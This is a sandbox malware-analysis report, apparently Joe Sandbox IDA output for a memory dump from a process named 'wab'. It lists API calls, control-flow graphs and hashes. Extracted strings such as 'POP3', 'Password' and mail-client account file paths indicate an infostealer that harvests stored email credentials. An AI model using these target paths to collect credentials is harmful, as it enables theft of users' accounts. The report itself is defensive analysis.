                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: _strlen$File$CopyCreateDelete
                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                            • API String ID: 3296212668-3023110444
                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                            • Instruction ID: 8831f8be9dcc4ceec7806ddb4cdc25e258cd9e0c059a92a71cc3875fed59e932
                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                            • Instruction Fuzzy Hash: 12611871D04219AFFF16CBA4C840BEEBBF9AF15304F10449AD604BB298DB745A46CF96

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: _strlen
                                            • String ID: %m$~$Gon~$~F@7$~dra
                                            • API String ID: 4218353326-230879103
                                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                            • Instruction ID: 0d5ddb6b1f9845117ac7198d1977348664a7516e9f13e5d1534fc9ecf46ddee0
                                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                            • Instruction Fuzzy Hash: 4B7167B1D042295BEF129BB58C84AEF7BFCAF19214F1000D6E644E7245E634DB89CFA0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 276 24397cc2-24397cd6 277 24397cd8-24397cdd 276->277 278 24397d44-24397d4c 276->278 277->278 279 24397cdf-24397ce4 277->279 280 24397d4e-24397d51 278->280 281 24397d93-24397dab call 24397e35 278->281 279->278 282 24397ce6-24397ce9 279->282 280->281 284 24397d53-24397d90 call 2439571e * 4 280->284 290 24397dae-24397db5 281->290 282->278 285 24397ceb-24397cf3 282->285 284->281 288 24397d0d-24397d15 285->288 289 24397cf5-24397cf8 285->289 295 24397d2f-24397d43 call 2439571e * 2 288->295 296 24397d17-24397d1a 288->296 289->288 292 24397cfa-24397d0c call 2439571e call 243990ba 289->292 293 24397dd4-24397dd8 290->293 294 24397db7-24397dbb 290->294 292->288 304 24397dda-24397ddf 293->304 305 24397df0-24397dfc 293->305 300 24397dbd-24397dc0 294->300 301 24397dd1 294->301 295->278 296->295 302 24397d1c-24397d2e call 2439571e call 243991b8 296->302 300->301 311 24397dc2-24397dd0 call 2439571e * 2 300->311 301->293 302->295 306 24397ded 304->306 307 24397de1-24397de4 304->307 305->290 309 24397dfe-24397e0b call 2439571e 305->309 306->305 307->306 314 24397de6-24397dec call 2439571e 307->314 311->301 314->306
                                            APIs
                                            • ___free_lconv_mon.LIBCMT ref: 24397D06
                                              • Part of subcall function 243990BA: _free.LIBCMT ref: 243990D7
                                              • Part of subcall function 243990BA: _free.LIBCMT ref: 243990E9
                                              • Part of subcall function 243990BA: _free.LIBCMT ref: 243990FB
                                              • Part of subcall function 243990BA: _free.LIBCMT ref: 2439910D
                                              • Part of subcall function 243990BA: _free.LIBCMT ref: 2439911F
                                              • Part of subcall function 243990BA: _free.LIBCMT ref: 24399131
                                              • Part of subcall function 243990BA: _free.LIBCMT ref: 24399143
                                              • Part of subcall function 243990BA: _free.LIBCMT ref: 24399155
                                              • Part of subcall function 243990BA: _free.LIBCMT ref: 24399167
                                              • Part of subcall function 243990BA: _free.LIBCMT ref: 24399179
                                              • Part of subcall function 243990BA: _free.LIBCMT ref: 2439918B
                                              • Part of subcall function 243990BA: _free.LIBCMT ref: 2439919D
                                              • Part of subcall function 243990BA: _free.LIBCMT ref: 243991AF
                                            • _free.LIBCMT ref: 24397CFB
                                              • Part of subcall function 2439571E: HeapFree.KERNEL32(00000000,00000000,?,2439924F,?,00000000,?,00000000,?,24399276,?,00000007,?,?,24397E5A,?), ref: 24395734
                                              • Part of subcall function 2439571E: GetLastError.KERNEL32(?,?,2439924F,?,00000000,?,00000000,?,24399276,?,00000007,?,?,24397E5A,?,?), ref: 24395746
                                            • _free.LIBCMT ref: 24397D1D
                                            • _free.LIBCMT ref: 24397D32
                                            • _free.LIBCMT ref: 24397D3D
                                            • _free.LIBCMT ref: 24397D5F
                                            • _free.LIBCMT ref: 24397D72
                                            • _free.LIBCMT ref: 24397D80
                                            • _free.LIBCMT ref: 24397D8B
                                            • _free.LIBCMT ref: 24397DC3
                                            • _free.LIBCMT ref: 24397DCA
                                            • _free.LIBCMT ref: 24397DE7
                                            • _free.LIBCMT ref: 24397DFF
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                            • String ID:
                                            • API String ID: 161543041-0
                                            • Opcode ID: ee241bed9917ebbb062d367634e3f36e6ec01047ec48e659eb1ed060e373fc1d
                                            • Instruction ID: c4f341e434df809b289175c1b942bc0322a7fabbecaf47ba9634ee882693f727
                                            • Opcode Fuzzy Hash: ee241bed9917ebbb062d367634e3f36e6ec01047ec48e659eb1ed060e373fc1d
                                            • Instruction Fuzzy Hash: D4313B33604A05DFEB219B38D980B67BBE9FF00210F14486AE859D72D5DF31EA80CB14

                                            Control-flow Graph

                                            APIs
                                            • _free.LIBCMT ref: 243959EA
                                              • Part of subcall function 2439571E: HeapFree.KERNEL32(00000000,00000000,?,2439924F,?,00000000,?,00000000,?,24399276,?,00000007,?,?,24397E5A,?), ref: 24395734
                                              • Part of subcall function 2439571E: GetLastError.KERNEL32(?,?,2439924F,?,00000000,?,00000000,?,24399276,?,00000007,?,?,24397E5A,?,?), ref: 24395746
                                            • _free.LIBCMT ref: 243959F6
                                            • _free.LIBCMT ref: 24395A01
                                            • _free.LIBCMT ref: 24395A0C
                                            • _free.LIBCMT ref: 24395A17
                                            • _free.LIBCMT ref: 24395A22
                                            • _free.LIBCMT ref: 24395A2D
                                            • _free.LIBCMT ref: 24395A38
                                            • _free.LIBCMT ref: 24395A43
                                            • _free.LIBCMT ref: 24395A51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 591478a53ea70301ccfb2e04bfe5c3b4ff1e597d3e112fb031d1b54e05d20f1b
                                            • Instruction ID: deeaf97f0b465b1106b60ba194036830adce5bcc34ae5434bc31bc2a57c3551a
                                            • Opcode Fuzzy Hash: 591478a53ea70301ccfb2e04bfe5c3b4ff1e597d3e112fb031d1b54e05d20f1b
                                            • Instruction Fuzzy Hash: 0511727B520148EFEB11DF94C941CDE3FA9EF14250B5541A5FA088B229DA32EF909B84

                                            Control-flow Graph

                                            APIs
                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 24391D1B
                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 24391D37
                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24391D4B
                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24391D58
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24391D72
                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24391D7D
                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 24391D8A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                            • String ID:
                                            • API String ID: 1454806937-0
                                            • Opcode ID: 3a3a5a7b1c6b236d1c455cd6a79da15eca6ce3c6727f17b97ae10637950072bb
                                            • Instruction ID: 6ca7b7b50e9c4c642dd0dc184035c0a0fff1276eb57ab69017962c207405c395
                                            • Opcode Fuzzy Hash: 3a3a5a7b1c6b236d1c455cd6a79da15eca6ce3c6727f17b97ae10637950072bb
                                            • Instruction Fuzzy Hash: 8C212CB194121CBFEB129BA09C8DEFB76ECEF18254F0409A5F611E2240DA749E458A70

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 377 24399492-243994ef GetConsoleCP 378 24399632-24399644 call 24392ada 377->378 379 243994f5-24399511 377->379 381 2439952c-2439953d call 24397c19 379->381 382 24399513-2439952a 379->382 389 2439953f-24399542 381->389 390 24399563-24399565 381->390 384 24399566-24399575 call 243979e6 382->384 384->378 391 2439957b-2439959b WideCharToMultiByte 384->391 392 24399609-24399628 389->392 393 24399548-2439955a call 243979e6 389->393 390->384 391->378 394 243995a1-243995b7 WriteFile 391->394 392->378 393->378 400 24399560-24399561 393->400 396 243995b9-243995ca 394->396 397 2439962a-24399630 GetLastError 394->397 396->378 399 243995cc-243995d0 396->399 397->378 401 243995fe-24399601 399->401 402 243995d2-243995f0 WriteFile 399->402 400->391 401->379 404 24399607 401->404 402->397 403 243995f2-243995f6 402->403 403->378 405 243995f8-243995fb 403->405 404->378 405->401
                                            APIs
                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,24399C07,?,00000000,?,00000000,00000000), ref: 243994D4
                                            • __fassign.LIBCMT ref: 2439954F
                                            • __fassign.LIBCMT ref: 2439956A
                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 24399590
                                            • WriteFile.KERNEL32(?,?,00000000,24399C07,00000000,?,?,?,?,?,?,?,?,?,24399C07,?), ref: 243995AF
                                            • WriteFile.KERNEL32(?,?,00000001,24399C07,00000000,?,?,?,?,?,?,?,?,?,24399C07,?), ref: 243995E8
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                            • String ID:
                                            • API String ID: 1324828854-0
                                            • Opcode ID: 6ae0c43c6947c6ba16973c0ceac1060b9f95e9ca335de43514d9c7588bdbf531
                                            • Instruction ID: e5c3b1d3194d2607c1b900dc81f0c846e4989ffba9fbca3483d319f4bdcd8806
                                            • Opcode Fuzzy Hash: 6ae0c43c6947c6ba16973c0ceac1060b9f95e9ca335de43514d9c7588bdbf531
                                            • Instruction Fuzzy Hash: AB51A171E00209AFDB01CFA8C896AEEBBF9EF09310F14455AE955E7391E770A941CB60

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 406 24393370-243933b5 call 24393330 call 243937a7 411 243933b7-243933c9 406->411 412 24393416-24393419 406->412 413 24393439-24393442 411->413 415 243933cb 411->415 412->413 414 2439341b-24393428 call 24393790 412->414 420 2439342d-24393436 call 24393330 414->420 416 243933d0-243933e7 415->416 418 243933e9-243933f7 call 24393740 416->418 419 243933fd 416->419 427 243933f9 418->427 428 2439340d-24393414 418->428 422 24393400-24393405 419->422 420->413 422->416 426 24393407-24393409 422->426 426->413 429 2439340b 426->429 430 243933fb 427->430 431 24393443-2439344c 427->431 428->420 429->420 430->422 432 2439344e-24393455 431->432 433 24393486-24393496 call 24393774 431->433 432->433 434 24393457-24393466 call 2439bbe0 432->434 438 24393498-243934a7 call 24393790 433->438 439 243934aa-243934c6 call 24393330 call 24393758 433->439 443 24393468-24393480 434->443 444 24393483 434->444 438->439 443->444 444->433
                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 2439339B
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 243933A3
                                            • _ValidateLocalCookies.LIBCMT ref: 24393431
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 2439345C
                                            • _ValidateLocalCookies.LIBCMT ref: 243934B1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 1170836740-1018135373
                                            • Opcode ID: fa08dde039b4ae40a749667bb24be8e8de0eccb39eb5e178a9d99bbaba4d3e58
                                            • Instruction ID: ee247a6ba9b5bc2c22566d536e9b8961bb346ca53ecc28fd0f9f0135b201fd9f
                                            • Opcode Fuzzy Hash: fa08dde039b4ae40a749667bb24be8e8de0eccb39eb5e178a9d99bbaba4d3e58
                                            • Instruction Fuzzy Hash: C541C3B4A00208ABCF01CFA8C884A9EBFF5EF49324F248155E915AB255D7B5EA15CB91

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 24399221: _free.LIBCMT ref: 2439924A
                                            • _free.LIBCMT ref: 243992AB
                                              • Part of subcall function 2439571E: HeapFree.KERNEL32(00000000,00000000,?,2439924F,?,00000000,?,00000000,?,24399276,?,00000007,?,?,24397E5A,?), ref: 24395734
                                              • Part of subcall function 2439571E: GetLastError.KERNEL32(?,?,2439924F,?,00000000,?,00000000,?,24399276,?,00000007,?,?,24397E5A,?,?), ref: 24395746
                                            • _free.LIBCMT ref: 243992B6
                                            • _free.LIBCMT ref: 243992C1
                                            • _free.LIBCMT ref: 24399315
                                            • _free.LIBCMT ref: 24399320
                                            • _free.LIBCMT ref: 2439932B
                                            • _free.LIBCMT ref: 24399336
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                            • Instruction ID: 1662bef29513660a7eb7c79cf4f6988b2b46e52fd7f2514578d1950b4e7cfbc6
                                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                            • Instruction Fuzzy Hash: 4E116372540B0CFAFA28ABF0DC45FCF7BDD9F14700F400825A6D97A256DA75B5844751

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 488 24395351-2439535e 489 2439537b-243953c7 call 2439571e * 4 488->489 490 24395360-2439536c 488->490 490->489 491 2439536e-24395375 call 2439571e 490->491 491->489
                                            APIs
                                            • _free.LIBCMT ref: 2439536F
                                              • Part of subcall function 2439571E: HeapFree.KERNEL32(00000000,00000000,?,2439924F,?,00000000,?,00000000,?,24399276,?,00000007,?,?,24397E5A,?), ref: 24395734
                                              • Part of subcall function 2439571E: GetLastError.KERNEL32(?,?,2439924F,?,00000000,?,00000000,?,24399276,?,00000007,?,?,24397E5A,?,?), ref: 24395746
                                            • _free.LIBCMT ref: 24395381
                                            • _free.LIBCMT ref: 24395394
                                            • _free.LIBCMT ref: 243953A5
                                            • _free.LIBCMT ref: 243953B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID: X-S$
                                            • API String ID: 776569668-3002976164
                                            • Opcode ID: cc64e6b187412b62d643b15d5a81f654301591f14d9bd9f6e250b39a1d96e86c
                                            • Instruction ID: c33dcb115333096219f04ceb82fa1977226da7c2457cff676e5479cfde01163d
                                            • Opcode Fuzzy Hash: cc64e6b187412b62d643b15d5a81f654301591f14d9bd9f6e250b39a1d96e86c
                                            • Instruction Fuzzy Hash: 36F0FE73CA5134DBD7035F2899844297FFBFB2D720351050AF820B7258DBB94A929F84
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,24396FFD,00000000,?,?,?,24398A72,?,?,00000100), ref: 2439887B
                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,24398A72,?,?,00000100,5EFC4D8B,?,?), ref: 24398901
                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 243989FB
                                            • __freea.LIBCMT ref: 24398A08
                                              • Part of subcall function 243956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 24395702
                                            • __freea.LIBCMT ref: 24398A11
                                            • __freea.LIBCMT ref: 24398A36
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                            • String ID:
                                            • API String ID: 1414292761-0
                                            • Opcode ID: 85ffd32827cac36440c10a12bb0204bd340cf5c4e6634a2850ef5fb575d0784e
                                            • Instruction ID: e342612bb103b0895759019f106f94b303c91cdd5ffa6ef7788e79eeca27bb1c
                                            • Opcode Fuzzy Hash: 85ffd32827cac36440c10a12bb0204bd340cf5c4e6634a2850ef5fb575d0784e
                                            • Instruction Fuzzy Hash: B051F473620216AFEB198E64CC81EAB3BE9EF857A4F114669FD05E6140EB35DC50C6A0
                                            APIs
                                            • _strlen.LIBCMT ref: 24391607
                                            • _strcat.LIBCMT ref: 2439161D
                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2439190E,?,?,00000000,?,00000000), ref: 24391643
                                            • lstrcatW.KERNEL32(?,?), ref: 2439165A
                                            • lstrlenW.KERNEL32(?,?,?,?,?,2439190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 24391661
                                            • lstrcatW.KERNEL32(00001008,?), ref: 24391686
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: lstrcatlstrlen$_strcat_strlen
                                            • String ID:
                                            • API String ID: 1922816806-0
                                            • Opcode ID: 4e27863bf8beeba768adf60fd9ea932179e2a84dea09f9df1fde94fc28ded482
                                            • Instruction ID: fd86d20ebe32337ca77073e8f5a6ac69831f4605f2d70b275c02144e21be6547
                                            • Opcode Fuzzy Hash: 4e27863bf8beeba768adf60fd9ea932179e2a84dea09f9df1fde94fc28ded482
                                            • Instruction Fuzzy Hash: DF21C836900204BBEB059B54EC81EFE77F8EF98724F24441AE904BB245DF34A94187A5
                                            APIs
                                            • lstrcatW.KERNEL32(?,?), ref: 24391038
                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2439104B
                                            • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 24391061
                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 24391075
                                            • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 24391090
                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 243910B8
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: lstrlen$AttributesFilelstrcat
                                            • String ID:
                                            • API String ID: 3594823470-0
                                            • Opcode ID: 2d6aa87680af8d43a1cf182670debed0c2db847ae68dc93ba163df020d255647
                                            • Instruction ID: 41f5edf0c24a1cd3216c75e2d890db21330df96e8f3a26f9b46c9e2121d9a7b5
                                            • Opcode Fuzzy Hash: 2d6aa87680af8d43a1cf182670debed0c2db847ae68dc93ba163df020d255647
                                            • Instruction Fuzzy Hash: 36219535900329ABEF21DB60EC48DDF37BCEF44214F104296E955A72A1DE319A85CF40
                                            APIs
                                            • GetLastError.KERNEL32(?,?,24393518,243923F1,24391F17), ref: 24393864
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 24393872
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2439388B
                                            • SetLastError.KERNEL32(00000000,?,24393518,243923F1,24391F17), ref: 243938DD
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: d5d4743c9d97ce2bae4ea29e59c093822db6ea6400b34f33b863ad51e859d686
                                            • Instruction ID: 6abfef138e0d885ab64418726217ae7d2d2e1d40c581432466ac7c4f4c13d8b5
                                            • Opcode Fuzzy Hash: d5d4743c9d97ce2bae4ea29e59c093822db6ea6400b34f33b863ad51e859d686
                                            • Instruction Fuzzy Hash: B501D4B3A4DB216EB30616B96C8592A6BD9DF1D774B200229F221A71D1EFF648098344
                                            APIs
                                            • GetLastError.KERNEL32(?,?,24396C6C), ref: 24395AFA
                                            • _free.LIBCMT ref: 24395B2D
                                            • _free.LIBCMT ref: 24395B55
                                            • SetLastError.KERNEL32(00000000,?,?,24396C6C), ref: 24395B62
                                            • SetLastError.KERNEL32(00000000,?,?,24396C6C), ref: 24395B6E
                                            • _abort.LIBCMT ref: 24395B74
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: ErrorLast$_free$_abort
                                            • String ID:
                                            • API String ID: 3160817290-0
                                            • Opcode ID: 88e3b04a22df6dff0f9cfc37173d1b59961fedc0c201133dd37eda1a3c18ee81
                                            • Instruction ID: b0f78bf65348a847a1d8e637bfaf277f3abff6c1cfb74fb4891e5cf1d5096353
                                            • Opcode Fuzzy Hash: 88e3b04a22df6dff0f9cfc37173d1b59961fedc0c201133dd37eda1a3c18ee81
                                            • Instruction Fuzzy Hash: BEF0C833546911FBE70327386C49E5F2AEEDFF5A71B240124F916A6285FF3585834164
                                            APIs
                                              • Part of subcall function 24391E89: lstrlenW.KERNEL32(?,?,?,?,?,243910DF,?,?,?,00000000), ref: 24391E9A
                                              • Part of subcall function 24391E89: lstrcatW.KERNEL32(?,?), ref: 24391EAC
                                              • Part of subcall function 24391E89: lstrlenW.KERNEL32(?,?,243910DF,?,?,?,00000000), ref: 24391EB3
                                              • Part of subcall function 24391E89: lstrlenW.KERNEL32(?,?,243910DF,?,?,?,00000000), ref: 24391EC8
                                              • Part of subcall function 24391E89: lstrcatW.KERNEL32(?,243910DF), ref: 24391ED3
                                            • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2439122A
                                              • Part of subcall function 2439173A: _strlen.LIBCMT ref: 24391855
                                              • Part of subcall function 2439173A: _strlen.LIBCMT ref: 24391869
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                            • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                            • API String ID: 4036392271-1520055953
                                            • Opcode ID: e3748456a6b212978713158ebc53840b3727372cbe45fd0977899930819f0c09
                                            • Instruction ID: 61c5039729adf235b96a566520a86a2cdbabf30e79461dff34100f6d1c6f7a46
                                            • Opcode Fuzzy Hash: e3748456a6b212978713158ebc53840b3727372cbe45fd0977899930819f0c09
                                            • Instruction Fuzzy Hash: 6621CEB9E502186AFB1197A0EC91FEE7379EF80714F000556F605FB2D4EAB12E848B58
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,24394AEA,?,?,24394A8A,?,243A2238,0000000C,24394BBD,00000000,00000000), ref: 24394B59
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 24394B6C
                                            • FreeLibrary.KERNEL32(00000000,?,?,?,24394AEA,?,?,24394A8A,?,243A2238,0000000C,24394BBD,00000000,00000000,00000001,24392082), ref: 24394B8F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3405736449.0000000024391000.00000040.00001000.00020000.00000000.sdmp, Offset: 24390000, based on PE: true
                                            • Associated: 00000009.00000002.3405719415.0000000024390000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3405736449.00000000243A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_24390000_wab.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 6acb1736ab0111dc8517c5fa2cbcd2f3284da9e8a3f5fa4e9e0b88b045204096
                                            • Instruction ID: 0461a2e1875e6f2ca822f0cc24469376db7e625aa2a41a81052bb96e97cdfa1f
